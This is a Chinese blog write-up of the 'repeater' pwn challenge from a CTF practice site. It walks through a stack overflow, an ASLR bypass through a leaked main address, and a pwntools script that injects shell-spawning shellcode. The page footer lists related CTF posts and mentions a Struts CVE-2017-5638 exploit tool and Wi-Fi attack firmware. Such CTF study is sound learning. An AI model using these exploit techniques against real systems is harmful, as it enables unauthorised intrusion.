PWN做题笔记10-repeater(ALSR绕过)

已于 2023-05-16 15:21:09 修改
阅读量371 收藏 1
点赞数 1
文章标签: 笔记 系统安全
于 2023-05-10 19:50:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/130608196
版权

这题攻防世界标的难度是1,感觉应该不止,另外吐槽一下graph那道题也标的难度1,结果进去一看防护措施全开了,完全麻爪.......

首先checksec:

 没有开栈保护、栈不可执行,可以考虑写shellcode再跳转。但是开了地址随机化,效果如下:

可以看到基地址会在运行时才确定,只能看到偏移地址,另外,上图中main函数首条指令的地址偏移为0xa33

 ida反汇编:

首次输入分配的空间为0x40h,可以用来存放shellcode,shellcode首地址就是inpName的地址,即0x202040

treatBeforeFor函数没有实际影响,这里不做分析,有兴趣可以自己看一看

溢出点在for内的read函数,即0x40>32

 此外,当v5=3281697时会打印泄露main函数的基地址,但是恒假,需要溢出覆盖

因此,本题的思路是:

1.首次输入写入shellcode

2.溢出覆盖v5的值,进入分支,获取main基址,计算程序的基址

3.下个循环再次溢出覆盖v5的值,并覆盖main函数的返回地址,令main可以正常退出并跳转到shellcode首条指令处

代码如下:

from pwn import *

context(os='linux', arch='amd64')

p=remote("61.147.171.105",49448)
#p=process("./repeater")
shellcode=asm(shellcraft.sh())
print(shellcode)
#first Command offset:0x202040
p.sendlineafter("your name :",shellcode)

p.sendlineafter("input",b"A"*0x20+p64(3281697))


p.readuntil(b"But there is gift for you :\n")
mainBaseAddr=int(p.recvline(),16)
print(mainBaseAddr)
BaseAddr=mainBaseAddr-0xA33
shellcodeAddr=BaseAddr+0x202040
payload= b'A'*0x20 + p64(0) + b"A"*0x8+ p64(0)+p64(shellcodeAddr)#make v5=0 and returncode=addr
p.sendline(payload)
p.interactive()

有两个要注意的地方:

1.我在作溢出的时候,狠狠的踩了坑,无论如何都会segement fault,最后发现需要增加context(os='linux', arch='amd64')来设置环境,兼容汇编

2.在最后的payload中,我们同时做了复制和覆盖ret地址,所以计算要准确,为v5覆盖p64(0)后,下图中使用了0x10下方的8个字节,因此后续应当+b"A"*0x8而非0x10

最后运行成功

_alpaca_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn入门小技巧
qq_36918532的博客
05-24 2607
目前我所遇到的一些pwn做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
pwn】攻防世界 pwn新手区wp
woodwhale的博客
08-10 7181
pwn】攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
WdIg-2023的博客
04-09 1892
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
repeater【攻防世界】
qq_41696518的博客
09-01 1520
repeater 攻防世界
bugku PWN repeater
alan___的博客
01-15 931
bugku PWN repeater exp分享
[Pwn]格式化字符串漏洞--2018科来杯 repeater
WitherC的练级之路
10-30 523
2018年山东省科来杯Pwn题目Repeater复现 补充一点汇编语言基础知识 对于我这种对汇编语言不怎么感冒的人来说,补充一些相应的汇编语言的基础知识还是很重要的 这里就针对本题中用到的汇编指令进行相应补充 lea与mov的区别:lea eax,[ebx+8]就是将ebx+8这个值直接赋给eax (相当于把地址赋给eax),而不是把ebx+8处的内存地址里的数据赋给eax。 而mov指令则恰恰相反,例如: mov eax,[ebx+8]则是把内存地址为ebx+8处的数据赋给eax。 cmp(compare
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 3885
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
攻防世界 Pwn Recho
MrTreebook的博客
12-18 638
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 1966
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
攻防世界 Pwn 新手
yongbaoii的博客
10-04 2943
是一个总结与汇总,会把见到的思路,想法,wp都记录下来,并进行简单的分类 这里面的每个题我都没有去检查保护,太麻烦,新手区也没有需要绕过保护的,最简单的canary绕过也在进阶。 ps:我这里用的是python2.7。如果用python3的话代码会有一个致命的不同,看我的另外一篇博客 字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题 01 get_shell 1、nc连接就行2、简单的exp from pwn import* r=remote("220.249.52.133
Linux学习笔记(二)
weixin_42515203的博客
05-28 336
Linux的学习笔记
Vue3实战笔记(52)—Vue 3封装持仓分析饼图
最新发布
山花的博客
05-30 509
接上文,封装持仓分析饼图。封装好几个组件,用于后续开发。把忧愁煮成茶,让它在心间慢慢沉淀,剩下的,便是清甜的回味。
强化学习——学习笔记
qq_52302919的博客
05-27 1365
强化学习问题通常可以建模为一个马尔可夫决策过程,包括以下几个要素:1、状态集合 (State Set):S;2、动作集合 (Action Set):A;Ps′∣saPs′∣sa,描述在状态s下执行动作a后转移到状态s′s^′s′的概率;Rsas′Rsas′,描述在状态s 下执行动作a并转移到状态s′后获得的奖励。πa∣sπ (a∣s)πa∣s,描述智能体在状态s下选择动作a 的概率。
Python图形界面(GUI)Tkinter笔记(十四):Entry与Button的碰撞(1)
肥辉的学习笔记
05-29 221
用功能按钮(Button)、单行文本输入框(Entry)、文本框内容读取(get)实现一个极简易的加法运算,及与其他控件的交互,提高体验,主要体现其人机交互的意义。因为Entry()文本输入框没有限制输入内容属性的参数,它是把所有的输入都视作它特有的一个类属性,所以用get()方法读取出来是一个字符串而这字符串可包括字母或其它符号。因此我们必须对其进行判断后再计算,若直接计算可能会出现不可预料的错误。这里用了try...except..进行了简单的错误判断处理。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwnrepeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值